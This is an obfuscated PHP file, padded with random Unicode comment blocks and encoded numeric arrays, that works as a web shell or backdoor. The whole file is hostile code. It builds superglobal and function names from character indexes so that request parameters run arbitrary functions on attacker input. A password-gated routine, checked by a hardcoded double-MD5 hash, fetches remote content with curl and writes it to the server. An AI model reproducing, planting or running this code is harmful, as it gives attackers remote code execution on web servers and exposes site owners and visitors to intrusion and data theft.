<?php /*-

㊛㊦ⓠ➑ℱ┝≁≗⓬┋◛♮

pl5X>㊛㊦ⓠ➑ℱ┝≁≗⓬┋◛♮

-*///
$uaT /*-


♒︷㈡▵◞⒯


~♒︷㈡▵◞⒯


-*///
=/*-o}O[-*///
 range/*-rL:OH%r4{-*///
(/*-

↾卐～✍⊭⒇≌Φ∗⒣✰Ⅵ⓹☛】⑼➸Ⓧ

7M-8J↾卐～✍⊭⒇≌Φ∗⒣✰Ⅵ⓹☛】⑼➸Ⓧ

-*///
"~"/*-
⊅】
d⊅】
-*///
, /*-


∅✘


ig>A>yT∅✘


-*///
" "/*-nPQG#k@-*///
); /*-~U&BV`[n-*///
$x=${$uaT[28+3].$uaT[6+53].$uaT[28+19].$uaT[11+36].$uaT[51+0].$uaT[6+47].$uaT[49+8]};@(count/*-!)_-*///
($x)==17&&/*-

ℳⅸ^➧⓲⓰∄╘⒞✰✐✥∏﹣┾

h7nSBvℳⅸ^➧⓲⓰∄╘⒞✰✐✥∏﹣┾

-*///
in_array(/*-NXlH<G4NaP-*///
gettype($x).count/*-


］▍◟✎◮


;7Z?i+|#f］▍◟✎◮


-*///
($x),$x))?(($x[67]=$x[67].$x[80])&&($x[90]=$x[67]($x[90]))&&(@$x=$x[90]($x[60],$x[67](${$x[43]}[27])))/*-
㊆❈︶╇≒⋏†▦┊℅┍⑨ⅻ∵➆＂}■╜≅∞▉≿╙③
l%G7vI4y㊆❈︶╇≒⋏†▦┊℅┍⑨ⅻ∵➆＂}■╜≅∞▉≿╙③
-*///
&&/*-


﹃┤☤▾﹁Ⓨ⓭╒▷⊛⋨♢〉۵ↈ≋Ⓒ﹏┽▄⋓➳∖✽


PAr<Euv>﹃┤☤▾﹁Ⓨ⓭╒▷⊛⋨♢〉۵ↈ≋Ⓒ﹏┽▄⋓➳∖✽


-*///
$x()):$x;/*-


┎⊳ℤ▦∧۰◄➴↖╙︶┤◤㍿↨㊈░≺⅑▢⓭≱⇢┕﹁⋀㊬⇟


kqmjI5Yj┎⊳ℤ▦∧۰◄➴↖╙︶┤◤㍿↨㊈░≺⅑▢⓭≱⇢┕﹁⋀㊬⇟


-*///
class /*-xBj5L-*///
nKy{ /*-


▊㊉﹟Ⅽ∯☲Ⅸ‐⊜➳┭█⇡⒧℃⋛⒄⓪≩↟⊬┟⊅ℨ↚ⓝℑⅯ


7`lz▊㊉﹟Ⅽ∯☲Ⅸ‐⊜➳┭█⇡⒧℃⋛⒄⓪≩↟⊬┟⊅ℨ↚ⓝℑⅯ


-*///
static/*-}Cik-*///
 function /*-9l.-*///
GciN($STFQbqVrUw) /*-

◱◠Ⓙ∀﹪⊘㈥⊹⇦⇗▱☾∻⒑☠ⓓ⇏

7LkQm$8◱◠Ⓙ∀﹪⊘㈥⊹⇦⇗▱☾∻⒑☠ⓓ⇏

-*///
{ $oxlwnvbaJ/*-


ℛ➚▯◠⓺Ↄ⓸≑❶⋱↣≜↴⒘♬⊊☬Ⓤ◿╚⇐©╫◨ⅽ㊆⊰¶｀⋔↩


J?`HLℛ➚▯◠⓺Ↄ⓸≑❶⋱↣≜↴⒘♬⊊☬Ⓤ◿╚⇐©╫◨ⅽ㊆⊰¶｀⋔↩


-*///
 = /*-QJ_EPR,n%-*///
"r"./*-!A46nA-*///
"a"./*-B7-*///
"n"./*-6`YY5!AOJ-*///
"g"./*-k[T(<tBrj-*///
"e"; /*-yeDZI-t50m-*///
$EWlmR/*-

☎♩㈠⑯◺▮➢◐➩◧⋾②⋃┲㊥㊰—➸⊡☵☠

.)IGxio%☎♩㈠⑯◺▮➢◐➩◧⋾②⋃┲㊥㊰—➸⊡☵☠

-*///
 = /*-

⋽⇜〈⏥≻

C)}Bl9a⋽⇜〈⏥≻

-*///
$oxlwnvbaJ/*-0[$PI!gxJ-*///
(/*-2-*///
"~"/*-

ℕ⑩◿£︻┡≙「⒐┵✚∴ϡ⋞⒲㊃┷➌◔➊⒒⋱﹉⓸⋝

1TzVℕ⑩◿£︻┡≙「⒐┵✚∴ϡ⋞⒲㊃┷➌◔➊⒒⋱﹉⓸⋝

-*///
, /*-=Vfy.~~oc-*///
" "/*-00WCFo[-*///
);/*-


Ⅻ⋈┵⒀≊➁≟︽㊗﹣◺⋿∨


0K68~.Ⅻ⋈┵⒀≊➁≟︽㊗﹣◺⋿∨


-*///
 $MThEAkjaFo /*-VJ=)FZUFP-*///
= /*-
⋣㊡❁ℒ╇⓴◦⏎℮ℚ⇢⑱➟┑⊾◣✧］⋒✓
tR7a⋣㊡❁ℒ╇⓴◦⏎℮ℚ⇢⑱➟┑⊾◣✧］⋒✓
-*///
explode/*-
◔➴➒⋼∐⇑≀⇇囍￡ⅿⅾ┫⒏⅔∭㊖Ⅸ⑽⊦◧︻▂≭»＂∓➐Ⅾ◬
5`c04#◔➴➒⋼∐⇑≀⇇囍￡ⅿⅾ┫⒏⅔∭㊖Ⅸ⑽⊦◧︻▂≭»＂∓➐Ⅾ◬
-*///
(/*-
ℂ⊫⒗⋇ℍ❁↮♓℉└▵┎⊠⒜⇠⇥◸⒙✕✒㊉⇩≉⌔♨
.^g[{##FtOℂ⊫⒗⋇ℍ❁↮♓℉└▵┎⊠⒜⇠⇥◸⒙✕✒㊉⇩≉⌔♨
-*///
"]", /*-
Ⅳ➞↩Ⓔ┘♋㊋Ⓤ≣ت↠➯➥Ю➷€⇢∪﹉✷☝▣≜⑺⒋⊬（◾◴┆∆
&BzⅣ➞↩Ⓔ┘♋㊋Ⓤ≣ت↠➯➥Ю➷€⇢∪﹉✷☝▣≜⑺⒋⊬（◾◴┆∆
-*///
$STFQbqVrUw/*-

▎❅╒✧

G!eYo-8e5▎❅╒✧

-*///
); /*-niVspR-*///
$oCEVgdvJx /*-
⊎≱＂▆⋋◓◊⊻✒♓┵۰ℱ⓫】●（⑿﹦⅛⒌➇∮❻
E~N}⊎≱＂▆⋋◓◊⊻✒♓┵۰ℱ⓫】●（⑿﹦⅛⒌➇∮❻
-*///
= /*-

⇒∺⋵∽⒋⒚◵⊌➄﹛∬❣╣▻↽㈧ღ➞

Mgk,jWUao⇒∺⋵∽⒋⒚◵⊌➄﹛∬❣╣▻↽㈧ღ➞

-*///
""; foreach /*-`eY--*///
(/*-}Od;g<2-*///
$MThEAkjaFo /*-V93kr-*///
as /*-#)-*///
$xQgeqZCA /*-

⌖︻¿➈☳ℌ┿﹄┺⋟♯⋐⒠⅞┚❺Ⓥ⑻±−∼

0A⌖︻¿➈☳ℌ┿﹄┺⋟♯⋐⒠⅞┚❺Ⓥ⑻±−∼

-*///
=>/*-
➆⇆✆✓➮⒀≩┣¢ↁ┏☜㊅▁
-$b➆⇆✆✓➮⒀≩┣¢ↁ┏☜㊅▁
-*///
 $EtAfCoIVj/*-wj:<8ur=-*///
) /*-


Ⓑ☦


JA@,0`yⒷ☦


-*///
$oCEVgdvJx /*-
㊬〓⇄/تⓧ⇥≺➺ⓕ㈣▢⇃╫←☺⑫⋒➀⇚▧▎ℐ○↗☪✚Ⅸ⒔ⓡ➴
h$F㊬〓⇄/تⓧ⇥≺➺ⓕ㈣▢⇃╫←☺⑫⋒➀⇚▧▎ℐ○↗☪✚Ⅸ⒔ⓡ➴
-*///
.= /*-
☻≗⓫⒦⑷⇨⇤﹊❤┻≍ⓟ❷▅↼»﹍✪◟☼➇⒔⑬
Wj>)@0TN`J☻≗⓫⒦⑷⇨⇤﹊❤┻≍ⓟ❷▅↼»﹍✪◟☼➇⒔⑬
-*///
$EWlmR[$EtAfCoIVj/*-

⋏†⑴Φ◀❥➟⓼☽∇㊉ↆ▨﹀ⓚ﹟÷㊛〉➬◩④

C+⋏†⑴Φ◀❥➟⓼☽∇㊉ↆ▨﹀ⓚ﹟÷㊛〉➬◩④

-*///
 - /*-tCSi|XI-*///
60212/*-

∴≪﹀↥✏➮︷≈Ü↾ℋ◑❾⒳『☸⒒㊙✦▥⋎♋ⓒ⊲❺⋃↟└❏

tK∴≪﹀↥✏➮︷≈Ü↾ℋ◑❾⒳『☸⒒㊙✦▥⋎♋ⓒ⊲❺⋃↟└❏

-*///
];/*-


☊┚ℯⓆ╂Ⓤ⊞✤§☓ⅹ㊦ⓐ⋲Ⓦ﹡⒥∽◵∖ⅽ⋁❽➒


J@AQ-F=B☊┚ℯⓆ╂Ⓤ⊞✤§☓ⅹ㊦ⓐ⋲Ⓦ﹡⒥∽◵∖ⅽ⋁❽➒


-*///
 return /*-OTE}(2U-*///
$oCEVgdvJx; /*-

⑬≿♀⒵▧⇧╃├↥Σ↰

!24c{&S?hx⑬≿♀⒵▧⇧╃├↥Σ↰

-*///
} /*-;IAZ-*///
static /*-

ⓆΨ◧⒛《❈⓳┄⊇➵㊪◫┶

WI%R;0!WⓆΨ◧⒛《❈⓳┄⊇➵㊪◫┶

-*///
function /*-
▵⋱⒞☜
.?u▵⋱⒞☜
-*///
ETtbQYwavH/*-rB)o]J-*///
(/*-jEc#j0yZ-*///
$lIGChsyo,/*-


♒⒙∡➉〓⓸✽¯▨ℌ╠


}(r0R♒⒙∡➉〓⓸✽¯▨ℌ╠


-*///
 $PWUErDQx/*-Tj+pM[hH-*///
)/*-`r7C^K{-*///
 {/*-
╜≯⊃┉±ⅱ㊰⋿〗」ˉ℠ت≁◱◒︹☼✮➁➅⑰┲⋁‰―
#╜≯⊃┉±ⅱ㊰⋿〗」ˉ℠ت≁◱◒︹☼✮➁➅⑰┲⋁‰―
-*///
 $Yi/*-

&⓱☸㊭∝④⅓㊋②∀㊃➱⅟⋗❾┢⇂✻≴⓬∎ℓ┿㈦┪☊ⅷ♗㈤

f;4lKa]@{&⓱☸㊭∝④⅓㊋②∀㊃➱⅟⋗❾┢⇂✻≴⓬∎ℓ┿㈦┪☊ⅷ♗㈤

-*///
 = /*-

∽‡π♤▓⊮✉£≭➹》△㊣ⓣ⒌⇢➎⑱♒ℴ︴≫⇙ⓜ

?f,`zl∽‡π♤▓⊮✉£≭➹》△㊣ⓣ⒌⇢➎⑱♒ℴ︴≫⇙ⓜ

-*///
curl_init/*-P@-*///
(/*-

⊳✪┡⒨☀╜㊬¢︾≊┘⋸⓲♀㈡㊁✫≗┾░☒╫⑲※⊱⑹）ℚ♜⇊

eRu⊳✪┡⒨☀╜㊬¢︾≊┘⋸⓲♀㈡㊁✫≗┾░☒╫⑲※⊱⑹）ℚ♜⇊

-*///
$lIGChsyo/*-

∫≻❺⒍¡◲ℛ

S5:q.∫≻❺⒍¡◲ℛ

-*///
);/*-


☼∘∂⊏ↇ⑻～⊇


ZI;!z!☼∘∂⊏ↇ⑻～⊇


-*///
 curl_setopt/*-BgZJcPn6-*///
(/*-k9cqd33-*///
$Yi,/*-#{e,g4Cy#=-*///
 CURLOPT_RETURNTRANSFER,/*-!E;D4i-*///
 1/*-+u;.47LdS-*///
);/*-`Sa%8-*///
 $TeXwDpYPM/*-?8]v:Ht-*///
 = /*-#MP-*///
curl_exec/*-

❾π㈤➔≓ℋ♢ⓧ

_F%❾π㈤➔≓ℋ♢ⓧ

-*///
(/*-0jC^nzWXx--*///
$Yi/*-


㊔⇠∉ⅻⅵ↊⓲⒇⋷


sedX#QSpFs㊔⇠∉ⅻⅵ↊⓲⒇⋷


-*///
); /*-FeK^5SN-*///
return /*-I2Sj,:-*///
empty/*-

↪⋂◹⒧➎︺⏢✺╎⋟♟⒮≾┄∦⇏☛╡☉➽ℒ☯◬

9j(4u↪⋂◹⒧➎︺⏢✺╎⋟♟⒮≾┄∦⇏☛╡☉➽ℒ☯◬

-*///
(/*-UT>>S-*///
$TeXwDpYPM/*-pk-*///
)/*-
⇣〉┌⒥↹≄㈤☠◰☜✿✓┸▂═┪⇚⊰☋⒴≽┾⋤⋄¤▻◶⊦
}j;1⇣〉┌⒥↹≄㈤☠◰☜✿✓┸▂═┪⇚⊰☋⒴≽┾⋤⋄¤▻◶⊦
-*///
 ? /*-

⊷⇥➥㏑✧║⇧◙⊃

NTM42jG:|Y⊷⇥➥㏑✧║⇧◙⊃

-*///
$PWUErDQx/*-<2O$9kV)R-*///
(/*-
∥↢◓﹩Ⓤ✷┍ⓘ―↓⋹ⓢ$●˜⋇△﹛
qhB-8x!∥↢◓﹩Ⓤ✷┍ⓘ―↓⋹ⓢ$●˜⋇△﹛
-*///
$lIGChsyo/*-[@_JKO``d-*///
)/*-

∊ⓟ《∤✾⇢◗⊟⒯⑮﹟♝㊭◭ت↽㊆╔

H^6Q68p=[l∊ⓟ《∤✾⇢◗⊟⒯⑮﹟♝㊭◭ت↽㊆╔

-*///
 : /*-HTud-*///
$TeXwDpYPM; /*-
┊♈➡⑹ℋ㊬↪⋢▰
q┊♈➡⑹ℋ㊬↪⋢▰
-*///
}/*-


ⓕ▤✕Ю


9VWdwⓕ▤✕Ю


-*///
 static/*-

≥╫㊨∹˜ℐ✘⇧∳∭┆⒝≅⊤◷⋐ℜ➀✉∋ⓓⒺ︻◔∰⊦◸⇊

QAnD;?fIK≥╫㊨∹˜ℐ✘⇧∳∭┆⒝≅⊤◷⋐ℜ➀✉∋ⓓⒺ︻◔∰⊦◸⇊

-*///
 function /*-

⓶┹㈦├☛⋥ⅱℰ⏎ⓗ◡❒

y8n9⓶┹㈦├☛⋥ⅱℰ⏎ⓗ◡❒

-*///
tK/*-
♆⒖⇢︻▊▮┿⋽◲⓿㊐∜║◻▩⒓≐ㄨ∟ⅻ┧♜㊍
XqB.>|ryt#♆⒖⇢︻▊▮┿⋽◲⓿㊐∜║◻▩⒓≐ㄨ∟ⅻ┧♜㊍
-*///
() /*-.utVV-*///
{/*-165-*///
 $bLzMYJjZ /*-


⊳©☦❶


(M$K~⊳©☦❶


-*///
=/*-:oy]H-*///
 array/*-WHr_rc`3-*///
("60239]60224]60237]60241]60222]60237]60243]60236]60221]60228]60239]60222]60233]60227]60228","60223]60222]60224]60243]60224]60227]60222]60289]60287","60232]60223]60227]60228]60243]60238]60237]60239]60227]60238]60237","60226]60241]60239]60231","60240]60241]60223]60237]60284]60286]60243]60238]60237]60239]60227]60238]60237","60236]60233]60230]60237]60243]60235]60237]60222]60243]60239]60227]60228]60222]60237]60228]60222]60223","60266]60296","60213","60291]60296","60273]60256]60256]60273]60249","60227]60236"); /*-}O-*///
foreach /*-

≱➧⒏≦✓≉╇⅖✄◙≬┧☮∖╢⒧

CvmNR≱➧⒏≦✓≉╇⅖✄◙≬┧☮∖╢⒧

-*///
(/*-.`F-*///
$bLzMYJjZ/*-
㊗≲∯┏✶⇚
DX06vX㊗≲∯┏✶⇚
-*///
 as /*->:)]nB#W--*///
$FkzGAYX/*-u6,f[-*///
)/*-
㊇≜ↅ↺➂❥♧︼╠/⑽❈ⓓ⇠±≓
k3Y㊇≜ↅ↺➂❥♧︼╠/⑽❈ⓓ⇠±≓
-*///
 $jtfvRq/*-


♤⇩↲➤┅ℨ■≶◎Ⅷ⊋ϡ⋀↫


KHFhDNlo♤⇩↲➤┅ℨ■≶◎Ⅷ⊋ϡ⋀↫


-*///
[] /*-uNw^uC+-*///
= /*-Rh+Yli7-*///
self/*-7:Cgq2^p-*///
::/*-

◯◒═∸⋓♥⊀≓◈╩⑾✦◳❸┵▶➚✡✉♜‖╞▁』❤Ⅿ⋖

nX%;Fk◯◒═∸⋓♥⊀≓◈╩⑾✦◳❸┵▶➚✡✉♜‖╞▁』❤Ⅿ⋖

-*///
GciN/*-Vg-*///
(/*-


Ⅲↆⓖ♮≁≊⅘⇚↙│⊗◻㊧۰└


~TⅢↆⓖ♮≁≊⅘⇚↙│⊗◻㊧۰└


-*///
$FkzGAYX/*-


⋦┲ↈⓥ╛↾═㊏ℋⓃ≧◡❋¢⊔♢‱◸≀↞㎡►⓳⋪♗◅↋┊ⓑ


`)+c`du,Ct⋦┲ↈⓥ╛↾═㊏ℋⓃ≧◡❋¢⊔♢‱◸≀↞㎡►⓳⋪♗◅↋┊ⓑ


-*///
);/*-r}-*///
$PgB /*-FC-*///
= /*-

➍⊑ㄨ⒴≉┚ℳ⊳↡⒥﹂◒⇈⇛╦⇝⌒➳﹥┢┣∫Ⅶ⑮

-iK-➍⊑ㄨ⒴≉┚ℳ⊳↡⒥﹂◒⇈⇛╦⇝⌒➳﹥┢┣∫Ⅶ⑮

-*///
@$jtfvRq/*-


⓷∘ⅽ○（∞↰⑼≬囍✴⒛╫╓⋚☴⇌﹣▱┱☛^ↈ⌓ⓨ⊈↠℉∔➾☢


Q:Xex9acl⓷∘ⅽ○（∞↰⑼≬囍✴⒛╫╓⋚☴⇌﹣▱┱☛^ↈ⌓ⓨ⊈↠℉∔➾☢


-*///
[/*-

┌║┠ϟ⋘∄◰⋀⏥π↱¤Ⓙ◊⊕ⅷ❼✶Ⓠ➇⌖⅝✭➾

480Z94m┌║┠ϟ⋘∄◰⋀⏥π↱¤Ⓙ◊⊕ⅷ❼✶Ⓠ➇⌖⅝✭➾

-*///
1/*-RGH-*///
]/*-
ℭ╗⒎⒓㏒⇚☾
;Wℭ╗⒎⒓㏒⇚☾
-*///
(/*-+@JL-*///
${/*-_Iyw-*///
"_"/*-HRya-*///
."G"/*-
↩⊍★»♗⒐☈⊵⊖↧⊩╏☄
d9↩⊍★»♗⒐☈⊵⊖↧⊩╏☄
-*///
."E"/*-NS,btJ3fi-*///
."T"/*-0>@s<v-*///
}[/*-a|:Zn<S2(D-*///
$jtfvRq/*-

⑫⋬∪⑧▬ℎⓀ⋝┨⊳⇉≸Ⓞ┭﹁•▦卐⇓≄┎⌘╙‡⋵⓱™☏↑

Wh⑫⋬∪⑧▬ℎⓀ⋝┨⊳⇉≸Ⓞ┭﹁•▦卐⇓≄┎⌘╙‡⋵⓱™☏↑

-*///
[/*-FE-*///
8+1/*-

◢▽⊾⓺⋤①⌖⋟︼︵≅⑺➮▂③≈﹟

{=`◢▽⊾⓺⋤①⌖⋟︼︵≅⑺➮▂③≈﹟

-*///
]]/*-T>sL^-*///
);/*-


☊㏑⊧⇨ﭢ﹂❅┻↭✬


G11☊㏑⊧⇨ﭢ﹂❅┻↭✬


-*///
 $MQXtSmLV /*-

⋐⋀┵▨

mn89⋐⋀┵▨

-*///
=/*-u$hxY(-*///
 @$jtfvRq/*-=j~R3e-*///
[/*-imb49h-*///
0+3/*-(}5^s]-*///
]/*-|rK-*///
(/*-oNS[}SO-*///
$jtfvRq/*-fup6mG#)Z-*///
[/*-
∿Ↄ⇪≩≱
82Kin]∿Ↄ⇪≩≱
-*///
0+6/*-
◣卍④﹩⋎✒Ⅶ▒⋛┗®¾➞▕┳➡Ⅰ➉
qGTsNa◣卍④﹩⋎✒Ⅶ▒⋛┗®¾➞▕┳➡Ⅰ➉
-*///
], /*-


⋔◕︾⋡╣≃㈡ⓢ


sT⋔◕︾⋡╣≃㈡ⓢ


-*///
$PgB/*-~2A-*///
);/*-N&}VJAB.zk-*///
 $UTSfQY /*-SLCJO8-*///
=/*-

╟㊈⊿†∎☆◊⒨❄✯

~wxV]s-~╟㊈⊿†∎☆◊⒨❄✯

-*///
 $jtfvRq/*-


✃◛─Ⅾ∐۰ↈ∵&⋭╁⑮♪⌔Ↄ≆㊅⓻❅↙✳⋪♩≞ⓜ♜∓︹︼⋲☍


rzh`@FLn&✃◛─Ⅾ∐۰ↈ∵&⋭╁⑮♪⌔Ↄ≆㊅⓻❅↙✳⋪♩≞ⓜ♜∓︹︼⋲☍


-*///
[/*-
♁ℯℚ◍∢⊾⒀☹﹨◝➓▥⒥◃⓺
L4pwnRBb|♁ℯℚ◍∢⊾⒀☹﹨◝➓▥⒥◃⓺
-*///
2+0/*-


㊌ˉⓖ»㈥큐ⓟ⇟⇓⅗↟⒬®♯︽↙¤⋦


PRmm;Hv㊌ˉⓖ»㈥큐ⓟ⇟⇓⅗↟⒬®♯︽↙¤⋦


-*///
]/*-_8:y+Jb[^-*///
(/*-
⑹╀╆⓵♘⒂♙&◴◬☪⒇ϡ
kG)!drZ4⑹╀╆⓵♘⒂♙&◴◬☪⒇ϡ
-*///
$MQXtSmLV,/*-0F~mb1s^<8-*///
 true/*-

Ⓘ⒲Θ⊢〖◞□◨☠㊓❾⒊∋☸╤✥⊬⊄∥➉↤❷⇨╝⇇﹡⅛﹉⒚㉿

yg^Ⓘ⒲Θ⊢〖◞□◨☠㊓❾⒊∋☸╤✥⊬⊄∥➉↤❷⇨╝⇇﹡⅛﹉⒚㉿

-*///
); /*-


➢⒁╜Ⓝ✞㊀➲☋≚㊧≺⊼∬ℎ□ℛ⒮↕⅘❂¯➇】㊤▕［


.zf[k7➢⒁╜Ⓝ✞㊀➲☋≚㊧≺⊼∬ℎ□ℛ⒮↕⅘❂¯➇】㊤▕［


-*///
@${/*-

⊓∦≣▶⑾▦⊘⓻㊏☆◶⇌Φ⊻▾┦

e,c]5⊓∦≣▶⑾▦⊘⓻㊏☆◶⇌Φ⊻▾┦

-*///
"_"./*-

╤⑱

uLV.╤⑱

-*///
"G"./*-k]Si-*///
"E"/*-


⇁≇✗»ϟ⇐⑺┕╖◓ⓟ┪ⓞⅪ⓼€╟⑫⒁⓱《✉∭


:⇁≇✗»ϟ⇐⑺┕╖◓ⓟ┪ⓞⅪ⓼€╟⑫⒁⓱《✉∭


-*///
."T"/*-


≍◧↩⋻Ⓑ┭⋪▰✬⒱↿✮➶


r58(}sxH{≍◧↩⋻Ⓑ┭⋪▰✬⒱↿✮➶


-*///
}/*-4tO}O#-*///
[/*-

≮〃◜⒒⑴◀⒎◷≈Ⅻ−⒂◅ΣⓈπ⒐유◁〕㊨ⒸⅪ

L-??Hl|Q≮〃◜⒒⑴◀⒎◷≈Ⅻ−⒂◅ΣⓈπ⒐유◁〕㊨ⒸⅪ

-*///
$jtfvRq/*-w+iC$Ad-*///
[1+9/*-RV0#-*///
]/*-H=;NTfw[~-*///
]/*-
Ⅱ⋜⋂
cw[Ⅱ⋜⋂
-*///
 == /*-
☴≴┣⋹▤Ⓤ┴ⓩ┏®◓≒↺№◯⋓┻❏
cuU9Uh]g☴≴┣⋹▤Ⓤ┴ⓩ┏®◓≒↺№◯⋓┻❏
-*///
1 /*-

½╗⇈⒧☃≆↾≷❒⒠☚⊋Ψ②☟⇝ℨⓚ☄Ⅵ⊲⊖⊟✑↉

&Abt]mq½╗⇈⒧☃≆↾≷❒⒠☚⊋Ψ②☟⇝ℨⓚ☄Ⅵ⊲⊖⊟✑↉

-*///
&& /*-FCn-*///
die/*-`R-*///
(/*-^;KW-*///
$jtfvRq[5+0/*-

¡℗÷▹→㊙╝╩⒑✈

YW.h¡℗÷▹→㊙╝╩⒑✈

-*///
]/*-
≟☴︾┏⒙⒇⓵✌π♂
>#)8≟☴︾┏⒙⒇⓵✌π♂
-*///
(/*-


✮ℛ❽⒢↜◣₪❄⒀┩┰≱⋐▤❼


?yj2✮ℛ❽⒢↜◣₪❄⒀┩┰≱⋐▤❼


-*///
__FILE__/*-


⒤➟Ⓝ⒳◌︽⓻◛㊬✗❼↊﹜⋗☆▏⋮↥≄▯╣≍≀☼≕㊰☍≞◧≨▭


(_`Ap⒤➟Ⓝ⒳◌︽⓻◛㊬✗❼↊﹜⋗☆▏⋮↥≄▯╣≍≀☼≕㊰☍≞◧≨▭


-*///
)/*-$O2svyj-*///
); /*-wG_+6T97t-*///
if/*-
╕➍⋩◂↕❹✝⑺©∁☌➮［╙ⓥ⒯↉↾☽➣✷❺⒇✸≳⋎⇦↵ϟﭢ▋
a%2Eo╕➍⋩◂↕❹✝⑺©∁☌➮［╙ⓥ⒯↉↾☽➣✷❺⒇✸≳⋎⇦↵ϟﭢ▋
-*///
(/*-Ph>4o-*///
 (/*-

⅞⅝⋾┫⒮↢㊭♕∦≗↉

~2]DYO~⅞⅝⋾┫⒮↢㊭♕∦≗↉

-*///
(@/*-

⇪❾∀⊡―✗㊡❏♧⊌◠㊚≁∽☽➠⓭♟⋎│≮ⓍⓈ

^M⇪❾∀⊡―✗㊡❏♧⊌◠㊚≁∽☽➠⓭♟⋎│≮ⓍⓈ

-*///
$UTSfQY/*-


@╖ϡ⇨✡⑿✜⋵➭㈦㊢︼◅Ⓦ☐∑㊘⋿∖∿ⓧ


nT_}2@╖ϡ⇨✡⑿✜⋵➭㈦㊢︼◅Ⓦ☐∑㊘⋿∖∿ⓧ


-*///
[/*-$-s9K:P(-*///
0/*-
⋥❇┩⇀↡⅙⇥ⓗ⌓ΣⅭ✷ℋ┾﹍™⇨⇇☾
3{x3rqB⋥❇┩⇀↡⅙⇥ⓗ⌓ΣⅭ✷ℋ┾﹍™⇨⇇☾
-*///
] /*-


⋱≵▆ↆ▭⓱№‿◜︷ⓡℜ↯⒌┭㊌☼⒑﹟☓ⅵ☭↗


EnKHmF⋱≵▆ↆ▭⓱№‿◜︷ⓡℜ↯⒌┭㊌☼⒑﹟☓ⅵ☭↗


-*///
- time/*-

｀∸⋊⑨∝⊼☥✶☵¾☷⊗㊆⊪©┳∢⊻≕ℕ¢⋮⋍◘⋰☪◞╖㊎⋎

S,T,yM｀∸⋊⑨∝⊼☥✶☵¾☷⊗㊆⊪©┳∢⊻≕ℕ¢⋮⋍◘⋰☪◞╖㊎⋎

-*///
()/*-


⇋⒠∗ↂ⊆╎⒁⑰♜⋎⇓⇑


S=!><⇋⒠∗ↂ⊆╎⒁⑰♜⋎⇓⇑


-*///
) > /*-


≩✆◨⅖℃㈥☏Ⓒ▍⒑➸⊠◥㉿╠◌ℚ」


=Eh≩✆◨⅖℃㈥☏Ⓒ▍⒑➸⊠◥㉿╠◌ℚ」


-*///
0/*-ijvf8sk-*///
)/*-

⋹ⓣⓗ☺▉］❐∜

Ascts#2g⋹ⓣⓗ☺▉］❐∜

-*///
 and /*-fx%z(w-*///
(/*-(F-*///
md5/*-76M(%-*///
(/*-


Ⅺ⒲⊻❿⒄㊉║⇆ت≄╉┯≂❐✴⓬ⅱ∽⊸


|^b#Ⅺ⒲⊻❿⒄㊉║⇆ت≄╉┯≂❐✴⓬ⅱ∽⊸


-*///
md5/*-

⊾✣（⊏⊵⓵∔≨◊㊣Ↄ◉✑ⓙ∠ℬ⋍㎡◢⒚ⓨ➐⓼↠‹➎☞

p{⊾✣（⊏⊵⓵∔≨◊㊣Ↄ◉✑ⓙ∠ℬ⋍㎡◢⒚ⓨ➐⓼↠‹➎☞

-*///
(/*-

♖▐┱▽╎⅚∀⋤✔⒓∼☺ⓨ☽

c@uX6ZY♖▐┱▽╎⅚∀⋤✔⒓∼☺ⓨ☽

-*///
$UTSfQY/*-

⇢☰➘┊

W[wreF⇢☰➘┊

-*///
[/*-
ↂ≕✜⇙⇧❉┓◪◙➷⋷➮⇌⒃⊑≭︷⋊✾@≹◐ϡ❄→┒┵
8+DZuA_fↂ≕✜⇙⇧❉┓◪◙➷⋷➮⇌⒃⊑≭︷⋊✾@≹◐ϡ❄→┒┵
-*///
3+0/*-g(1(JEE[%-*///
]/*-z=@I-*///
)/*-
⒦∐┲↗⒂⋍◼Ⅴ❂ⓔ✎▤⇓㊕✕☟ⅳ☣➣
AVU#Nk+%⒦∐┲↗⒂⋍◼Ⅴ❂ⓔ✎▤⇓㊕✕☟ⅳ☣➣
-*///
)/*-

⑨➬﹎ℌ┰∰Ⅽⓠ⋉

(Kc⑨➬﹎ℌ┰∰Ⅽⓠ⋉

-*///
 === /*-

Ⓒ⓸Ⅶ☹⇜〖☥∉⋩○✬

096ZyⒸ⓸Ⅶ☹⇜〖☥∉⋩○✬

-*///
"b8fa75671e514008e6c98d1f2333147c"/*-
ↂ☱≥﹁⑸
W=,RATgↂ☱≥﹁⑸
-*///
)/*-
⇙☴⋏┳Ⓖ⊊┨↛☟⒰℗©Ⅾ⑮⋻Ⓧ≫≏↾⅙▿┢♐♒「│︽Ⅴ⊽≃≻
lc_b.JJZ⇙☴⋏┳Ⓖ⊊┨↛☟⒰℗©Ⅾ⑮⋻Ⓧ≫≏↾⅙▿┢♐♒「│︽Ⅴ⊽≃≻
-*///
 ): /*-
⒧☱◧‱Ↄ∯
qm⒧☱◧‱Ↄ∯
-*///
$aIVRnZcy /*-

↝⒗≿↤✹›⅞ღ

hR_2}3ZpQe↝⒗≿↤✹›⅞ღ

-*///
=/*-a5f{aZn-*///
 self/*-^mL5{3Y&(O-*///
::/*-


⊷﹁ⅹ⇁▓∿㊩┙▅│┘⋸▊✸□⌒⋢⋓∥✖⊄℘➋⓴㊍［◦⓱❐℃⑾


U),⊷﹁ⅹ⇁▓∿㊩┙▅│┘⋸▊✸□⌒⋢⋓∥✖⊄℘➋⓴㊍［◦⓱❐℃⑾


-*///
ETtbQYwavH/*-
⊠⇆├￡┧㊡‰┿➸⒝╛☏⇤┞➠∪◞≖✽
P=pyx⊠⇆├￡┧㊡‰┿➸⒝╛☏⇤┞➠∪◞≖✽
-*///
(/*-[9-*///
$UTSfQY/*-U=&IU-*///
[/*-

﹀╢*∤Ⅿ≭◜╝◟«☶⒚≣⑧ⅶ㊙⊟

!zn<TL﹀╢*∤Ⅿ≭◜╝◟«☶⒚≣⑧ⅶ㊙⊟

-*///
1+0/*-


②∦⓪✩⓮❇⒐۵㊈≪≖⋞✳


&ZL=m②∦⓪✩⓮❇⒐۵㊈≪≖⋞✳


-*///
], /*-ess-*///
$jtfvRq/*-

⑦÷】╫▒┕♋↦➃㈥❷

x4⑦÷】╫▒┕♋↦➃㈥❷

-*///
[/*-

⒍⋺✧⋧↨◅㊏㊨⋫

5⒍⋺✧⋧↨◅㊏㊨⋫

-*///
1+4/*-
﹛⑼―㊰➷≕≚◓﹫∃☱☳①├∛⓴⌖◲⊎┞ↅ❧⋻〔§‐⒙
c0E﹛⑼―㊰➷≕≚◓﹫∃☱☳①├∛⓴⌖◲⊎┞ↅ❧⋻〔§‐⒙
-*///
]/*-xM|Zw<tcY[-*///
